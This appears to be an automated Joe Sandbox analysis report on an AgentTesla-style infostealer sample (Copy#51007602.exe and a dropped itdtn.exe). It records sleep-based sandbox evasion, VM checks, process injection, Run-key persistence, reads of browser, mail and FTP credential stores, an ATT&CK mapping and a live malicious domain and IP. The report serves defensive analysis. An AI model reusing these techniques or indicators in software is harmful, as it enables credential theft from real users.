                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -99891s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 4836 Thread sleep count: 2238 > 30
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -99782s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -99657s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -99532s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -99422s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -99313s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -99188s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -99063s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -98938s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -98797s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -98687s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -98577s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -98469s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -98327s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -98219s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -98110s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 5744 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -99875s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 6204 Thread sleep count: 2891 > 30
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 6204 Thread sleep count: 696 > 30
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -99765s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -99656s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -99547s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -99422s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -99312s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -99203s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -99094s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -98969s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -98859s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -98750s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -98640s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -98531s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -98422s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -98310s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -98203s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -98094s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\Copy#51007602.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Copy#51007602.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Last function: Thread delayed
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 100000
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 99891
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 99782
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 99657
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 99532
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 99422
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 99313
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 99188
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 99063
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 98938
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 98797
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 98687
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 98577
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 98469
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 98327
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 98219
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 98110
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 99875
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 99765
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 99656
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 99547
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 99422
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 99312
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 99203
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 99094
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 98969
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 98859
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 98750
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 98640
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 98531
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 98422
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 98310
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 98203
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 98094
                        Source: itdtn.exe, 00000005.00000002.3232710766.000000000177A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                        Source: itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                        Source: Copy#51007602.exe, 00000002.00000002.3232678455.000000000161D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory written: C:\Users\user\Desktop\Copy#51007602.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Memory written: C:\Users\user\AppData\Roaming\itdtn.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Process created: C:\Users\user\Desktop\Copy#51007602.exe "C:\Users\user\Desktop\Copy#51007602.exe"
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Process created: C:\Users\user\AppData\Roaming\itdtn.exe "C:\Users\user\AppData\Roaming\itdtn.exe"
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Queries volume information: C:\Users\user\Desktop\Copy#51007602.exe VolumeInformation
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Queries volume information: C:\Users\user\AppData\Roaming\itdtn.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        Source: Yara match File source: dump.pcap, type: PCAP
                        Source: Yara match File source: 4.2.itdtn.exe.506b9a8.11.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.itdtn.exe.506b9a8.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.3235618888.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000005.00000002.3236815937.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.3235618888.0000000003307000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: Copy#51007602.exe PID: 6008, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: Copy#51007602.exe PID: 4084, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: itdtn.exe PID: 2604, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: itdtn.exe PID: 3936, type: MEMORYSTR
                        Source: Yara match File source: 0.2.Copy#51007602.exe.50d0000.15.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.3bbe9a0.3.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.50d0000.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.3de7dd0.6.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.40111f0.11.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000002.2123443818.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe File opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Users\user\Desktop\Copy#51007602.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                        Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 111 Process Injection | 2 Obfuscated Files or Information | 1 Credentials in Registry | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Software Packing | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 141 Virtualization/Sandbox Evasion | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
[Behavior graph: ID 1448039, Sample: Copy#51007602.exe, Start date: 27/05/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label
Copy#51007602.exe | 29% | Virustotal |
Copy#51007602.exe | 16% | ReversingLabs |
Copy#51007602.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\itdtn.exe | 100% | Avira | HEUR/AGEN.1332199
C:\Users\user\AppData\Roaming\itdtn.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
api.ipify.org | 1% | Virustotal |

Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
https://api.ipify.org/ | 0% | URL Reputation | safe
https://api.ipify.org | 0% | URL Reputation | safe
https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
https://api.ipify.org/t | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe
https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe
https://github.com/mgravell/protobuf-neti | 0% | Avira URL Cloud | safe
https://github.com/mgravell/protobuf-net | 0% | Avira URL Cloud | safe
http://jahnindustry.shop | 0% | Avira URL Cloud | safe
https://github.com/mgravell/protobuf-netJ | 0% | Avira URL Cloud | safe
https://github.com/mgravell/protobuf-net | 0% | Virustotal |
https://github.com/mgravell/protobuf-neti | 0% | Virustotal |
https://github.com/mgravell/protobuf-netJ | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
jahnindustry.shop | 66.29.151.236 | true | true | | unknown
api.ipify.org | 104.26.13.205 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/mgravell/protobuf-net | Copy#51007602.exe, itdtn.exe | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://api.ipify.org | Copy#51007602.exe, itdtn.exe | false | URL Reputation: safe | unknown
http://jahnindustry.shop | Copy#51007602.exe, itdtn.exe | false | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-neti | Copy#51007602.exe, itdtn.exe | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://stackoverflow.com/q/14436606/23354 | Copy#51007602.exe, itdtn.exe | false | URL Reputation: safe | unknown
https://account.dyn.com/ | Copy#51007602.exe, itdtn.exe | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-netJ | Copy#51007602.exe, itdtn.exe | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://api.ipify.org/t | Copy#51007602.exe, itdtn.exe | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Copy#51007602.exe, itdtn.exe | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/11564914/23354; | Copy#51007602.exe, itdtn.exe | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/2152978/23354 | Copy#51007602.exe | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
66.29.151.236 | jahnindustry.shop | United States | 19538 | ADVANTAGECOMUS | true
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1448039
Start date and time: 2024-05-27 15:14:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Copy#51007602.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/3@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 495
• Number of non-executed functions: 34
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:15:06 | API Interceptor | 17x Sleep call for process: Copy#51007602.exe modified
09:15:19 | API Interceptor | 18x Sleep call for process: itdtn.exe modified
15:14:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run itdtn C:\Users\user\AppData\Roaming\itdtn.exe
15:15:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run itdtn C:\Users\user\AppData\Roaming\itdtn.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
66.29.151.236 | Doc100057638xls.exe | malicious | AgentTesla, PureLog Stealer |
66.29.151.236 | REF0000QWERT544FILE.vbe | malicious | AgentTesla |
66.29.151.236 | Doc0781123608.exe | malicious | AgentTesla, PureLog Stealer, XWorm |
66.29.151.236 | Doc1000050789.exe | malicious | AgentTesla, PureLog Stealer |
66.29.151.236 | 5021036673.exe | malicious | Nanocore, AgentTesla, PureLog Stealer |
66.29.151.236 | Vessel Position.exe | malicious | AgentTesla, PureLog Stealer |
66.29.151.236 | fNLCIrX52t.exe | malicious | AgentTesla |
66.29.151.236 | IMG1024785000.exe | malicious | Nanocore, AgentTesla, PureLog Stealer |
66.29.151.236 | IMG_608900026.022.exe | malicious | AgentTesla, PureLog Stealer |
66.29.151.236 | PAYMENT COPY 02521.exe | malicious | AgentTesla, PureLog Stealer, XWorm |
104.26.13.205 | ReturnLegend.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.13.205 | SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exe | malicious | PureLog Stealer, Targeted Ransomware | api.ipify.org/
104.26.13.205 | Sky-Beta-Setup.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.13.205 | ArenaWarSetup.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.13.205 | Sky-Beta Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/?format=json
104.26.13.205 | E4sbo4F6Sz.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | E4sbo4F6Sz.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | SecuriteInfo.com.Win64.RATX-gen.31127.4101.exe | malicious | PureLog Stealer, Targeted Ransomware | api.ipify.org/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | Doc100057638xls.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
api.ipify.org | 0000003448.pdf.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | Stamp invoice copy.xls.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | GestorRemesasCONFIRMIMING.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | DRAWING_SHEET_P02405912916 .exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | proforma invoice.bit.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | INV 0983 OSY 240524_PDF.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | PO_27052024.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | Remittance#26856.html | malicious | HTMLPhisher | 104.26.13.205

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | https://drive.google.com/uc?export=download&id=12v1VZUwGaH9dJNC24k24Rn9zAkDKRnBD | malicious | Unknown | 172.64.151.101
CLOUDFLARENETUS | PxuZ1WpCgf.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 188.114.97.3
CLOUDFLARENETUS | https://web.cinepagal.org | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | Doc100057638xls.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
CLOUDFLARENETUS | hZ80PhOmKK.elf | malicious | Unknown | 104.17.134.249
CLOUDFLARENETUS | RECEIPT-CARGO 00009933CRER3S.exe | malicious | FormBook | 23.227.38.32
CLOUDFLARENETUS | ctm_260524_pdf.exe | malicious | FormBook | 104.21.40.171
CLOUDFLARENETUS | RB_VAC_1.EXE.exe | malicious | DBatLoader, FormBook | 104.21.84.83
                                              ADVANTAGECOMUSDoc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 66.29.151.236
                                              RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                              • 66.29.137.12
                                              4TH HIRE SOA REMITTANCE_USD280,000.exeGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
                                              PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
                                              #U0426#U0438#U0442#U0430#U0442#U0430.exeGet hashmaliciousFormBookBrowse
                                              • 66.29.149.193
                                              REF0000QWERT544FILE.vbeGet hashmaliciousAgentTeslaBrowse
                                              • 66.29.151.236
                                              Offer Document 23.lnkGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
